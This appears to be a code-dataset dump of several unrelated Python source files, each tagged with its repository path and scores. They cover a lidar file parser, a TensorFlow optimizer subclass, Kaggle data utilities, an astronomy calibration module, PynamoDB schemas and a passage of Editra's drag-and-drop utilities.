<reponame>IFAEControl/lidar-cli import struct f = open("c0610400.102200", 'rb') class DateTime: def __init__(self): line = f.readline().strip() self._letter = chr(line[0]) self._year = line[1:3].decode("utf-8") self._month = int(chr(line[3]), 16) self._day = line[4:6].decode("utf-8") self._hour = line[6:8].decode("utf-8") self._minute = line[9:11].decode("utf-8") self._second = line[11:13].decode("utf-8") self._millis = line[13:15].decode("utf-8") def __str__(self): date = "{}/{}/{} ".format(self._day, self._month, self._year) time = "{}:{}:{}.{}".format(self._hour, self._minute, self._second, self._millis) return "{} {}".format(date, time) class Location: def __init__(self): line = f.readline().strip() self._location = line[0:9].strip().decode("utf-8") self._start_time = line[9:28].decode("utf-8") self._stop_time = line[29:48].decode("utf-8") self._higt_asl = line[49:53].decode("utf-8") self._longitude = line[54:60].decode("utf-8") self._latitude = line[61:67].decode("utf-8") self._zenith_angle = line[68:70].decode("utf-8") def __str__(self): return "Location: {}\nStart: {}\nEnd: {}\nAltitude: {}, longitude: {}, latitude: {}, zenith_angle: {}".format( self._location, self._start_time, self._stop_time, self._higt_asl, self._longitude, self._latitude, self._zenith_angle ) class LaserData: def __init__(self): line = f.readline().strip() self.shots_laser_1 = line[0:7].decode("utf-8") # XXX: Official documentation (22 february 2019) states that there should be 5 numbers but official licel app # only returns 4 self.pulse_freq_1 = line[8:12].decode("utf-8") self.shots_laser_2 = line[13:20].decode("utf-8") # XXX: Official documentation (22 february 2019) states that there should be 5 numbers but official licel app # only returns 4 self.pulse_freq_2 = line[21:24].decode("utf-8") self.datasets_num = int(line[26:28].decode("utf-8")) self.undocumented_laser_3 = line[29:36].decode("utf-8") self.undocumented_freq_3 = line[37:41].decode("utf-8") def __str__(self): return str(self.datasets_num) class DatasetDescription: def __init__(self): line = f.readline().strip() self._active = bool(int(chr(line[0]))) self._analog = False self._phontocounting = False tmp = bool(int(chr(line[2]))) if tmp: self._phontocounting = True else: self._analog = True self._laser = int(chr(line[4])) self._bins = line[6:11].decode("utf-8") self._one = line[12] self._pmt_voltage = line[14:18].decode("utf-8") # XXX: Docs say two digits before the dot. But there is only one. self._binwith = line[19:23].decode("utf-8") self._wavelength = line[24:29].decode("utf-8") self._polarisation = None tmp = chr(line[31]) if tmp == 'o': self._polarisation = "No" elif tmp == 's': self._polarisation = "Perpendicular" elif tmp == "i": self._polarisation = "parallel" self._adc_bits = line[43:45].decode("utf-8") self._number_of_shots = line[46:52].decode("utf-8") self._analog_range_or_disc = line[53:58].decode("utf-8") # XXX: According to the documentation BT = analog but in our samples from the official software BT = photon # we only read the TR number self._tr = int(chr(line[-1])) def __str__(self): print(self._tr) return "Active: {}, analog: {}, photoncounting: {}, " \ "laser: {}, bins: {}".format(self._active, self._analog, self._phontocounting, self._laser, self._bins) def read_dataset(file): ch = file.read(1) buf = [] while True: if chr(ch[0]) == '\n' and chr(buf[-1]) == '\r': break buf.append(ch[0]) ch = file.read(1) buf.append(ch[0]) return bytes(buf) class Data: def __init__(self): # \r\n f.readline() # Actual dataset, without \r\n line = read_dataset(f)[:-2] line = read_dataset(f)[:-2] line = read_dataset(f)[:-2] int_array = [x[0] for x in struct.iter_unpack('<I', line)] converted = [(x/58)*(500/(2**16-1)) for x in int_array] print(converted) class Header: def __init__(self): self._date_time = DateTime() self._location = Location() self._laser_data = LaserData() self._datasets_descriptions = [] for _ in range(self._laser_data.datasets_num): self._datasets_descriptions.append(DatasetDescription()) self._data = Data() def __str__(self): print(self._laser_data) for i in self._datasets_descriptions: print(i) return "{}\n{}".format(self._date_time, self._location) h = Header() print(h)
2.5625
3
built-in/TensorFlow/Official/nlp/BertLarge_ID0634_for_TensorFlow2.X/bert/tf2_common/training/optimizer_v2modified.py
Ascend/modelzoo
12
16748
<reponame>Ascend/modelzoo # Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Modified optimizer_v2 implementation enabling XLA across variable updates.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf from tensorflow.python.distribute import distribution_strategy_context as distribute_ctx from tensorflow.python.distribute import parameter_server_strategy from tensorflow.python.framework import ops from tensorflow.python.framework import dtypes from tensorflow.python.keras import backend from tensorflow.python.keras.optimizer_v2 import optimizer_v2 from tensorflow.python.keras.optimizer_v2 import utils as optimizer_utils from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import variables as tf_variables class OptimizerV2Modified(optimizer_v2.OptimizerV2): """This is a subclass optimizer that performs variable updates in Distribution Strategy replica context. OptimizerV2 base class is currently under refactoring and will have better support of this. Please refer to optimizer_v2.OptimizerV2 for more details regarding the APIs. """ def __init__(self, name, use_experimental_compile=False, **kwargs): """Create a new Optimizer. Args: name: Optional name prefix for variables and ops created by the optimizer. use_experimental_compile: when set to True, use experimental_compile on the _distributed_apply function. """ super(OptimizerV2Modified, self).__init__(name=name, **kwargs) self.use_experimental_compile = use_experimental_compile def apply_gradients(self, grads_and_vars, name=None, experimental_aggregate_gradients=True): """Apply gradients to variables. Only the last two lines are different from optimizer_v2.OptimizerV2. Args: grads_and_vars: List of (gradient, variable) pairs. name: Optional name for the returned operation. Default to the name passed to the `Optimizer` constructor. experimental_aggregate_gradients: Whether to sum gradients from different replicas in the presense of `tf.distribute.Strategy`. If False, it's user responsibility to aggregate the gradients. Default to True. Returns: An `Operation` that applies the specified gradients. The `iterations` will be automatically increased by 1. Raises: TypeError: If `grads_and_vars` is malformed. ValueError: If none of the variables have gradients. RuntimeError: If called in cross-replica context. """ # pylint: disable=protected-access grads_and_vars = optimizer_utils.filter_empty_gradients(grads_and_vars) # pylint: enable=protected-access var_list = [v for (_, v) in grads_and_vars] with ops.name_scope_v2(self._name): # Create iteration if necessary. with ops.init_scope(): self._create_all_weights(var_list) if not grads_and_vars: # Distribution strategy does not support reducing an empty list of # gradients return control_flow_ops.no_op() if distribute_ctx.in_cross_replica_context(): raise RuntimeError( "`apply_gradients() cannot be called in cross-replica context. " "Use `tf.distribute.Strategy.run` to enter replica " "context.") strategy = distribute_ctx.get_strategy() if (not experimental_aggregate_gradients and strategy and isinstance( strategy.extended, parameter_server_strategy.ParameterServerStrategyExtended)): raise NotImplementedError( "`experimental_aggregate_gradients=False is not supported for " "ParameterServerStrategy and CentralStorageStrategy") apply_state = self._prepare(var_list) if experimental_aggregate_gradients: grads_and_vars = self._transform_unaggregated_gradients(grads_and_vars) grads_and_vars = self._aggregate_gradients(grads_and_vars) grads_and_vars = self._transform_gradients(grads_and_vars) self._distributed_apply(None, grads_and_vars, name, apply_state) return self._iterations.assign_add(1, read_value=False) def _distributed_apply_org(self, distribution, grads_and_vars, name, apply_state): """`apply_gradients` using a `DistributionStrategy`. This is the _distributed_apply function in optimizer_v2, returning a list of ops. """ def apply_grad_to_update_var(var, grad): """Apply gradient to variable.""" if isinstance(var, ops.Tensor): raise NotImplementedError("Trying to update a Tensor ", var) apply_kwargs = {} if isinstance(grad, ops.IndexedSlices): if var.constraint is not None: raise RuntimeError( "Cannot use a constraint function on a sparse variable.") if "apply_state" in self._sparse_apply_args: apply_kwargs["apply_state"] = apply_state return self._resource_apply_sparse_duplicate_indices( grad.values, var, grad.indices, **apply_kwargs) if "apply_state" in self._dense_apply_args: apply_kwargs["apply_state"] = apply_state update_op = self._resource_apply_dense(grad, var, **apply_kwargs) if var.constraint is not None: with ops.control_dependencies([update_op]): return var.assign(var.constraint(var)) else: return update_op update_ops = [] with ops.name_scope(name or self._name, skip_on_eager=True): for grad, var in grads_and_vars: update_ops.append(apply_grad_to_update_var(var, grad)) return control_flow_ops.group(*update_ops) def _distributed_apply(self, distribution, grads_and_vars, name, apply_state): if self.use_experimental_compile: self._distributed_apply_compile(distribution, grads_and_vars, name, apply_state) else: self._distributed_apply_org(distribution, grads_and_vars, name, apply_state) #@tf.function(experimental_compile=True) def _distributed_apply_compile(self, distribution, grads_and_vars, name, apply_state): """This is a warpper, to return a tensor, making tf.func() happy.""" self._distributed_apply_org(distribution, grads_and_vars, name, apply_state) return tf.ones((), dtype=tf.bool)
1.734375
2
src/data/utils.py
behavioral-data/multiverse
0
16749
<filename>src/data/utils.py import os import errno import requests import glob import os import json from tqdm import tqdm from selenium import webdriver from selenium.webdriver.firefox.options import Options def make_sure_path_exists(path): try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def download_file(url, out_path,file_mode = "wb"): response = requests.get(url) if response: out_file = open(out_path,file_mode) out_file.write(response.content) out_file.close() return response.status_code == requests.codes.ok def version_path_to_components(path): slug_path, version_file = os.path.split(path) version_id = version_file.split(".")[0] comp_path, slug_id = os.path.split(slug_path) comp_name = os.path.basename(comp_path) return {"version_id" : version_id, "slug_id" : slug_id, "comp_name" : comp_name} class CompetitionReader(object): def __init__(self, path, python_only=False): self.path = path self.slug_ids = [os.path.basename(x) for x in glob.glob(os.path.join(self.path, "*"))] self.comp_name = os.path.basename(self.path) self.python_only = python_only def apply_to_slugs(self,fn): # Applies a function fn to a list of dicts of notebooks for slug_id in self.slug_ids: versions = self.load_slug_versions(slug_id) yield fn(versions) def load_slug_versions(self,slug_id): versions = [] for path in glob.glob(os.path.join(self.path,slug_id,"*.json")): with open(path) as version_file: filename = os.path.basename(path) version_id = os.path.splitext(filename)[0] try: version = json.load(version_file) if not isinstance(version,dict): continue except json.decoder.JSONDecodeError: continue if self.python_only: try: if not version["metadata"]["language_info"]["name"] == "python": continue except KeyError: continue version["version_id"] = version_id version["path"] = path versions.append(version) return versions def write_jsonl(open_file, data, mode = "a"): for datum in data: open_file.write(json.dumps(datum)) open_file.write("\n") def load_jsonl(path): lines = [] with open(path, 'r', encoding='utf-8') as f: for line in f: loaded_line = json.loads(line) lines.append(loaded_line) return lines def is_git_line(line): return len(line) >0 and line[0] in ["+","-"] def remove_git_chars(line): if is_git_line(line): return line[1:] else: return line class KaggleDiffsReader(): def __init__(self,diff_path): self.diff_path = diff_path self.diffs = [] with open(self.diff_path, 'r', encoding='utf-8') as f: for line in tqdm(f, desc="Loading Diffs"): diff_line = json.loads(line) orig, new = self.split_orig_and_new(diff_line) diff = { "metadata":diff_line["metadata"], "orig":orig, "new":new, "cell_diff":diff_line["celll_diff"] } self.diffs.append(diff) def __len__(self): return len(self.diffs) def __getitem__(self,i): return self.diffs[i] def remove_git_chars(self,line): if line[0] in ["+","-"]: return line[1:] else: return line def split_orig_and_new(self,diff): #TODO: Current preserves the plus or minus lines = diff["cell_diff"].split("\n") orig = [self.remove_git_chars(x) for x in lines if len(x)>0 and x[0] != "+" ] new = [self.remove_git_chars(x) for x in lines if len(x)>0 and x[0] != "-"] return "\n".join(orig), "\n".join(new) def split_orig_and_new(diff): lines = diff.split("\n") orig = [remove_git_chars(x) for x in lines if len(x)>0 and x[0] != "+" ] new = [remove_git_chars(x) for x in lines if len(x)>0 and x[0] != "-"] return "\n".join(orig), "\n".join(new) def get_inserted_and_removed(diff, as_string = False): lines = diff.split("\n") inserted = [remove_git_chars(x) for x in lines if len(x)>0 and x[0] == "+" ] removed = [remove_git_chars(x) for x in lines if len(x)>0 and x[0] == "-"] if as_string: return "\n".join(inserted), "\n".join(removed) else: return inserted, removed
2.609375
3
LeetCode/Product and Sum/Subtract_Product_And_Sum.py
GSri30/Competetive_programming
22
16750
class Solution: def subtractProductAndSum(self, n: int) -> int: x = n add = 0 mul = 1 while x > 0 : add += x%10 mul *= x%10 x = x//10 return mul - add
3.25
3
jocular/calibrator.py
MartinCooke/jocular
6
16751
''' Handles calibration library and calibration of subs. ''' import os.path import numpy as np from scipy.stats import trimboth from kivy.app import App from loguru import logger from kivy.properties import BooleanProperty, DictProperty, NumericProperty from kivy.core.window import Window from jocular.table import Table from jocular.utils import make_unique_filename from jocular.component import Component from jocular.settingsmanager import Settings from jocular.image import Image, save_image, fits_in_dir date_time_format = '%d %b %y %H:%M' class Calibrator(Component, Settings): save_settings = ['apply_dark', 'apply_flat', 'apply_bias'] masters = DictProperty({}) apply_flat = BooleanProperty(False) apply_dark = BooleanProperty(False) apply_bias = BooleanProperty(False) use_l_filter = BooleanProperty(True) exposure_tol = NumericProperty(5) temperature_tol = NumericProperty(5) dark_days_tol = NumericProperty(1) flat_days_tol = NumericProperty(60) tab_name = 'Calibration' configurables = [ ('use_l_filter', {'name': 'use light flat?', 'switch': '', 'help': 'If there is no flat for the given filter, use a light flat if it exists'}), ('exposure_tol', {'name': 'exposure tolerance', 'float': (0, 30, 1), 'fmt': '{:.0f} seconds', 'help': 'When selecting a dark, select those within this exposure tolerance'}), ('temperature_tol', {'name': 'temperature tolerance', 'float': (0, 40, 1), 'fmt': '{:.0f} degrees', 'help': 'When selecting a dark, restrict to those within this temperature tolerance'}), ('dark_days_tol', {'name': 'dark age tolerance', 'float': (0, 300, 1), 'fmt': '{:.0f} days', 'help': 'Maximum age of darks to use if no temperature was specified'}), ('flat_days_tol', {'name': 'flat age tolerance', 'float': (0, 300, 1), 'fmt': '{:.0f} days', 'help': 'Maximum age of flats to use'}), ] def __init__(self, **kwargs): super().__init__(**kwargs) self.app = App.get_running_app() self.calibration_dir = self.app.get_path('calibration') self.masters = {} # map from name to FITs Image instance self.library = {} # map from name to calibration table info ''' construct above dicts from calibration FITs in calibration directory ''' for f in fits_in_dir(self.calibration_dir): path = os.path.join(self.calibration_dir, f) try: s = Image(path) if s.is_master: self.add_to_library(s) except Exception as e: logger.warning('Calibrator: unable to parse calibration {:} ({:})'.format(f, e)) def on_new_object(self, *args): n_masters = len(self.library) if n_masters > 0: self.info('{:d} masters'.format(n_masters)) else: self.info('no masters') def add_to_library(self, m): ''' called on initialisation and when we save a new master ''' # keys are full names so they can be reliably deleted self.masters[m.fullname] = m self.library[m.fullname] = { 'name': m.name, 'type': m.sub_type, 'exposure': str(m.exposure) if m.exposure is not None else '???', 'temperature': str(m.temperature) if m.temperature is not None else '???', 'filter': m.filter, 'created': m.create_time.strftime(date_time_format), 'shape_str': m.shape_str, 'age': m.age, 'nsubs': m.nsubs if m.nsubs is not None else 0 } def create_master(self, sub_type=None, exposure=None, temperature=None, filt=None): ''' Called by ObjectIO to save an existing stack capture by Jocular as a calibration master ''' logger.info('save master type {:} expo {:} temp {:} filt {:}'.format( sub_type, exposure, temperature, filt)) stacker = Component.get('Stacker') # force the use of method that the user has chosen or set up by default for this type of calib master = stacker.get_stack(filt, calibration=True) ''' Apply bad pixel mapping to calibration frames If dark, find hot pixels in master and remove, otherwise use existing BPM NB not fully tested ''' bpm = Component.get('BadPixelMap') if sub_type == 'dark': master = bpm.do_bpm(master, bpm.find_hot_pixels(master)) logger.debug('created BPM from darks and applied it') else: master = bpm.do_bpm(master) logger.debug('applied BPM to master') ''' Flats were divided thru by their robust mean to account for level differences but then scaled to 50% to enable B/W controls; so multiply by 2 ''' if sub_type == 'flat': master = 2 * master self.save_master(data=master, exposure=exposure, filt=filt, temperature=temperature, sub_type=sub_type, nsubs=stacker.get_selected_sub_count()) # add to notes field of current DSO Component.get('Notes').notes = 'exposure {:} filter {:} temperature {:}'.format(exposure, filt, temperature) def save_master(self, data=None, exposure=None, filt=None, temperature=None, sub_type=None, nsubs=None): ''' Save master and add to library to make it available immediately. Called both by create_master above and by the Watched camera for any alien master subs. The difference is that create_master above does BPM/flat handling etc so only applies to natively-captured calibration masters. ''' logger.info('new master type {:} expo {:} temp {:} filt {:} nsubs {:}'.format( sub_type, exposure, temperature, filt, nsubs)) name = 'master{:}.fit'.format(sub_type) path = make_unique_filename(os.path.join(self.calibration_dir, name)) save_image(data=data, path=path, exposure=exposure, filt=filt, temperature=temperature, sub_type='master ' + sub_type, nsubs=nsubs) self.add_to_library(Image(path)) def calibrate(self, sub): # Given a light sub, apply calibration. Fails silently if no suitable calibration masters. sub.calibrations = set({}) if not self.library: self.info('no library') return if not (self.apply_dark or self.apply_bias or self.apply_flat): self.info('none') return # get all masters (check speed, but should be quick) dark = self.get_dark(sub) flat = self.get_flat(sub) bias = self.get_bias(sub) logger.debug('D {:} F {:} B {:}'.format(dark, flat, bias)) D = self.get_master(dark) # if D is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(dark, np.min(D), np.max(D), np.median(D), np.mean(D))) F = self.get_master(flat) # if F is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(flat, np.min(F), np.max(F), np.median(F), np.mean(F))) B = self.get_master(bias) # if B is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(bias, np.min(B), np.max(B), np.median(B), np.mean(B))) im = sub.get_image() if self.apply_dark and self.apply_flat: if dark is not None and flat is not None: im = (im - D) / F sub.calibrations = {'dark', 'flat'} elif dark is not None: im = im - D sub.calibrations = {'dark'} elif flat is not None: if bias is not None: sub.calibrations = {'flat', 'bias'} im = (im - B) / F else: sub.calibrations = {'flat'} im = im / F # inadvisable, but we allow it elif self.apply_dark: if dark is not None: im = im - D sub.calibrations = {'dark'} elif self.apply_flat: if flat is not None: if bias is not None: sub.calibrations = {'flat', 'bias'} im = (im - B) / F else: sub.calibrations = {'flat'} im = im / F elif self.apply_bias: if bias is not None: sub.calibrations = {'bias'} im = im - B # limit im[im < 0] = 0 im[im > 1] = 1 sub.image = im applied = ' '.join(list(sub.calibrations)) if applied: self.info(applied) else: self.info('none suitable') def get_dark(self, sub): # Find suitable dark for this sub given its parameters if sub.exposure is None: return None # choose darks that are the right shape with exposure within tolerance darks = {k: v for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 'dark' and v.exposure is not None and abs(v.exposure - sub.exposure) < self.exposure_tol} temperature = Component.get('Session').temperature if temperature is not None: # we know temperature, select those with temperatures and within tolerance darks = [k for k, v in darks.items() if v.temperature is not None and abs(v.temperature - temperature) < self.temperature_tol] else: # find those within date tolerance (set to 1 to get darks in current session) darks = [k for k, v in darks.items() if v.age < self.dark_days_tol] # if we have darks, return name of first one return darks[0] if len(darks) > 0 else None def get_bias(self, sub): # get the most recent bias bias = {k: v.age for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 'bias' } return min(bias, key=bias.get) if len(bias) > 0 else None def get_flat(self, sub): # flats of right shape flats = {k:v for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 'flat'} # flat in required filter if sub.filter is not None: flats_in_filt = {k: v for k, v in flats.items() if v.filter is not None and v.filter == sub.filter} else: flats_in_filt = {} # if we have none and can use L filter, use these if (len(flats_in_filt) == 0) and self.use_l_filter: flats_in_filt = {k:v for k, v in flats.items() if v.filter == 'L'} # do we have any now? if not, return if len(flats_in_filt) == 0: return None # find any within day tolerance, noting that this compares the date of the flat with # the date of the sub (i.e. not necessarily the current date) flats = {k: abs(v.create_time - sub.create_time).days for k,v in flats_in_filt.items()} flats = {k: v for k, v in flats.items() if v <= self.flat_days_tol} # find most recent if there is a choice for k in sorted(flats, key=flats.get): return k return None def get_master(self, name): if name is None: return None # Retrieve image (NB loaded on demand, so effectively a cache) return self.masters[name].get_image() def _most_subs(self, cands): c = {k: cands[k]['nsubs'] for k in cands.keys()} return max(c, key=c.get) def calibrate_flat(self, sub): ''' Perform calibrations on flat which include subtracting bias if available , and rescaling so the mean intensity is .5 (because outlier rejection methods used to combine flat subs work best with normalised frames due to changing light levels; the value of .5 is so that we can use B & W controls; we rescale to a mean of 1 when saving since this is what a good flat needs for dividing) ''' im = sub.get_image() # subtract bias if available bias = self.get_bias(sub) if bias is not None: #print('subtracting bias') im = im - self.get_master(bias) # normalise by mean of image in central 3rd zone perc = 75 # retain central 75% of points when computing mean w, h = im.shape w1, w2 = int(w / 3), int(2 * w / 3) h1, h2 = int(h / 3), int(2 * h / 3) imr = im[h1: h2, w1: w2] robust_mean = np.mean(trimboth(np.sort(imr.ravel(), axis=0), (100 - perc)/100, axis=0), axis=0) sub.image = .5 * im / robust_mean def build_calibrations(self): ''' Contruct table from library ''' return Table( size=Window.size, data=self.library, name='Calibration masters', description='Calibration masters', cols={ 'Name': {'w': 300, 'align': 'left', 'field': 'name'}, 'Type': {'w': 60, 'field': 'type', 'align': 'left'}, 'Exposure': {'w': 80, 'field': 'exposure'}, 'Temp. C': {'w': 80, 'field': 'temperature', 'type': str}, 'Filter': {'w': 80, 'field': 'filter'}, 'Created': {'w': 180, 'field': 'created', 'sort': {'DateFormat': date_time_format}}, 'Size': {'w': 110, 'field': 'shape_str'}, 'Age': {'w': 50, 'field': 'age', 'type': int}, 'Subs': {'w': 50, 'field': 'nsubs', 'type': int} }, actions={'move to delete dir': self.move_to_delete_folder}, on_hide_method=self.app.table_hiding ) def show_calibration_table(self, *args): ''' Called when user clicks 'library' on GUI ''' if not hasattr(self, 'calibration_table'): self.calibration_table = self.build_calibrations() self.app.showing = 'calibration' # check for redraw if self.calibration_table not in self.app.gui.children: self.app.gui.add_widget(self.calibration_table, index=0) self.calibration_table.show() def move_to_delete_folder(self, *args): objio = Component.get('ObjectIO') for nm in self.calibration_table.selected: if nm in self.library: objio.delete_file(os.path.join(self.calibration_dir, nm)) del self.library[nm] del self.masters[nm] logger.info('deleted {:} calibration masters'.format(len(self.calibration_table.selected))) self.calibration_table.update()
2.09375
2
test/office_schema.py
chrismaille/marshmallow-pynamodb
3
16752
<filename>test/office_schema.py from test.office_model import Headquarters, Office from marshmallow import fields from pynamodb.attributes import DiscriminatorAttribute from marshmallow_pynamodb import ModelSchema class OfficeSchema(ModelSchema): """Office Schema for PynamoDB Office Model. We are overriding PynamoDB NumberSetAttribute and UnicodeSetAttribute fields to maintain list order """ numbers = fields.List(fields.Integer) departments = fields.List(fields.String) security_number = fields.Str(allow_none=True) cls = DiscriminatorAttribute() class Meta: """Schema Model Meta Class.""" model = Office class HQSchema(OfficeSchema): """Model Schema with parent Schemas field Introspection. Fields are introspected using parent marshmallow ModelSchemas. (ex.: OfficeSchema Schema) """ class Meta: model = Headquarters class HeadquartersSchema(ModelSchema): """Model Schema with parent Models field Introspection. Fields are introspected using parent PynamoDB Models. (ex.: Office Model) """ class Meta: model = Headquarters
2.546875
3
energy_demand/initalisations/initialisations.py
willu47/energy_demand
0
16753
"""Helper initialising functions """ #pylint: disable=I0011, C0321, C0301, C0103, C0325, R0902, R0913, no-member, E0213 def init_fuel_tech_p_by(all_enduses_with_fuels, nr_of_fueltypes): """Helper function to define stocks for all enduse and fueltype Parameters ---------- all_enduses_with_fuels : dict Provided fuels nr_of_fueltypes : int Nr of fueltypes Returns ------- fuel_tech_p_by : dict """ fuel_tech_p_by = {} for enduse in all_enduses_with_fuels: fuel_tech_p_by[enduse] = dict.fromkeys(range(nr_of_fueltypes), {}) return fuel_tech_p_by def dict_zero(first_level_keys): """Initialise a dictionary with one level Parameters ---------- first_level_keys : list First level data Returns ------- one_level_dict : dict dictionary """ one_level_dict = dict.fromkeys(first_level_keys, 0) # set zero as argument return one_level_dict def service_type_tech_by_p(lu_fueltypes, fuel_tech_p_by): """Initialise dict and fill with zeros Parameters ---------- lu_fueltypes : dict Look-up dictionary fuel_tech_p_by : dict Fuel fraction per technology for base year Return ------- service_fueltype_tech_by_p : dict Fraction of service per fueltype and technology for base year """ service_fueltype_tech_by_p = {} for fueltype_int in lu_fueltypes.values(): service_fueltype_tech_by_p[fueltype_int] = dict.fromkeys(fuel_tech_p_by[fueltype_int].keys(), 0) return service_fueltype_tech_by_p
3.078125
3
npd_well_decoder/__init__.py
fmell/npd-well-name-decoder
0
16754
<reponame>fmell/npd-well-name-decoder from .npd import parse_wellbore_name
0.867188
1
Lib/site-packages/wx-3.0-msw/wx/tools/Editra/src/util.py
jickieduan/python27
5
16755
<reponame>jickieduan/python27 ############################################################################### # Name: util.py # # Purpose: Misc utility functions used through out Editra # # Author: <NAME> <<EMAIL>> # # Copyright: (c) 2008 <NAME> <<EMAIL>> # # License: wxWindows License # ############################################################################### """ This file contains various helper functions and utilities that the program uses. """ __author__ = "<NAME> <<EMAIL>>" __svnid__ = "$Id: util.py 72623 2012-10-06 19:33:06Z CJP $" __revision__ = "$Revision: 72623 $" #--------------------------------------------------------------------------# # Imports import os import sys import mimetypes import encodings import codecs import urllib2 import wx # Editra Libraries import ed_glob import ed_event import ed_crypt import dev_tool import syntax.syntax as syntax import syntax.synglob as synglob import ebmlib _ = wx.GetTranslation #--------------------------------------------------------------------------# class DropTargetFT(wx.PyDropTarget): """Drop target capable of accepting dropped files and text @todo: has some issues with the clipboard on windows under certain conditions. They are not fatal but need fixing. """ def __init__(self, window, textcallback=None, filecallback=None): """Initializes the Drop target @param window: window to receive drop objects @keyword textcallback: Callback for when text is dropped @keyword filecallback: Callback for when file(s) are dropped """ super(DropTargetFT, self).__init__() # Attributes self.window = window self._data = dict(data=None, fdata=None, tdata=None, tcallb=textcallback, fcallb=filecallback) self._tmp = None self._lastp = None # Setup self.InitObjects() def CreateDragString(self, txt): """Creates a bitmap of the text that is being dragged @todo: possibly set colors to match highlighting of text @todo: generalize this to be usable by other widgets besides stc """ if not isinstance(self.window, wx.stc.StyledTextCtrl): return stc = self.window txt = txt.split(stc.GetEOLChar()) longest = (0, 0) for line in txt: ext = stc.GetTextExtent(line) if ext[0] > longest[0]: longest = ext cords = [ (0, x * longest[1]) for x in range(len(txt)) ] try: mdc = wx.MemoryDC(wx.EmptyBitmap(longest[0] + 5, longest[1] * len(txt), 32)) mdc.SetBackgroundMode(wx.TRANSPARENT) mdc.SetTextForeground(stc.GetDefaultForeColour()) mdc.SetFont(stc.GetDefaultFont()) mdc.DrawTextList(txt, cords) self._tmp = wx.DragImage(mdc.GetAsBitmap()) except wx.PyAssertionError, msg: Log("[droptargetft][err] %s" % str(msg)) def InitObjects(self): """Initializes the text and file data objects @postcondition: all data objects are initialized """ self._data['data'] = wx.DataObjectComposite() self._data['tdata'] = wx.TextDataObject() self._data['fdata'] = wx.FileDataObject() self._data['data'].Add(self._data['tdata'], True) self._data['data'].Add(self._data['fdata'], False) self.SetDataObject(self._data['data']) def OnEnter(self, x_cord, y_cord, drag_result): """Called when a drag starts @param x_cord: x cord of enter point @param y_cord: y cord of enter point @param drag_result: wxDrag value @return: result of drop object entering window """ # GetData seems to happen automatically on msw, calling it again # causes this to fail the first time. if wx.Platform in ['__WXGTK__', '__WXMSW__']: return wx.DragCopy if wx.Platform == '__WXMAC__': try: self.GetData() except wx.PyAssertionError: return wx.DragError self._lastp = (x_cord, y_cord) files = self._data['fdata'].GetFilenames() text = self._data['tdata'].GetText() if len(files): self.window.SetCursor(wx.StockCursor(wx.CURSOR_COPY_ARROW)) else: self.CreateDragString(text) return drag_result def OnDrop(self, x_cord=0, y_cord=0): """Gets the drop cords @keyword x_cord: x cord of drop object @keyword y_cord: y cord of drop object @todo: implement snapback when drop is out of range """ self._tmp = None self._lastp = None return True def OnDragOver(self, x_cord, y_cord, drag_result): """Called when the cursor is moved during a drag action @param x_cord: x cord of mouse @param y_cord: y cord of mouse @param drag_result: Drag result value @return: result of drag over @todo: For some reason the caret position changes which can be seen by the brackets getting highlighted. However the actual caret is not moved. """ stc = self.window if self._tmp is None: if hasattr(stc, 'DoDragOver'): val = stc.DoDragOver(x_cord, y_cord, drag_result) self.ScrollBuffer(stc, x_cord, y_cord) drag_result = wx.DragCopy else: # A drag image was created if hasattr(stc, 'DoDragOver'): point = wx.Point(x_cord, y_cord) self._tmp.BeginDrag(point - self._lastp, stc) self._tmp.Hide() stc.DoDragOver(x_cord, y_cord, drag_result) self._tmp.Move(point) self._tmp.Show() self._tmp.RedrawImage(self._lastp, point, True, True) self._lastp = point self.ScrollBuffer(stc, x_cord, y_cord) drag_result = wx.DragCopy return drag_result def OnData(self, x_cord, y_cord, drag_result): """Gets and processes the dropped data @param x_cord: x coordinate @param y_cord: y coordinate @param drag_result: wx Drag result value @postcondition: dropped data is processed """ self.window.SetCursor(wx.StockCursor(wx.CURSOR_ARROW)) if self.window.HasCapture(): self.window.ReleaseMouse() try: data = self.GetData() except wx.PyAssertionError: wx.PostEvent(self.window.GetTopLevelParent(), \ ed_event.StatusEvent(ed_event.edEVT_STATUS, -1, _("Unable to accept dropped file " "or text"))) data = False drag_result = wx.DragCancel if data: files = self._data['fdata'].GetFilenames() text = self._data['tdata'].GetText() if len(files) > 0 and self._data['fcallb'] is not None: self._data['fcallb'](files) elif len(text) > 0: if self._data['tcallb'] is not None: self._data['tcallb'](text) elif hasattr(self.window, 'DoDropText'): self.window.DoDropText(x_cord, y_cord, text) self.InitObjects() return drag_result def OnLeave(self): """Handles the event of when the drag object leaves the window @postcondition: Cursor is set back to normal state """ self.window.SetCursor(wx.StockCursor(wx.CURSOR_ARROW)) if self.window.HasCapture(): self.window.ReleaseMouse() if self._tmp is not None: try: self._tmp.EndDrag() except wx.PyAssertionError, msg: Log("[droptargetft][err] %s" % str(msg)) @staticmethod def ScrollBuffer(stc, x_cord, y_cord): """Scroll the buffer as the dragged text is moved towards the ends. @param stc: StyledTextCtrl @param x_cord: int (x position) @param y_cord: int (y position) @note: currently does not work on wxMac """ try: cline = stc.PositionFromPoint(wx.Point(x_cord, y_cord)) if cline != wx.stc.STC_INVALID_POSITION: cline = stc.LineFromPosition(cline) fline = stc.GetFirstVisibleLine() lline = stc.GetLastVisibleLine() if (cline - fline) < 2: stc.ScrollLines(-1) elif lline - cline < 2: stc.ScrollLines(1) else: pass except wx.PyAssertionError, msg: Log("[droptargetft][err] ScrollBuffer: %s" % msg) #---- End FileDropTarget ----# class EdClipboard(ebmlib.CycleCache): """Local clipboard object @todo: make into a singleton """ def GetNext(self): """Get the next item in the cache""" # Initialize the clipboard if it hasn't 